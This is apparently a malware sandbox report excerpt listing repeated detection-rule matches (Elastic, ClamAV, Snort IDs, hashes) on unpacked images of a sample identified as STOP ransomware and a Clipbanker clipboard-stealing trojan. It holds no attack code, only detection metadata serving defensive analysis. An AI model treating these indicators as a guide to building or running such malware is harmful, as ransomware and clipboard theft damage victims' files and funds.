Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
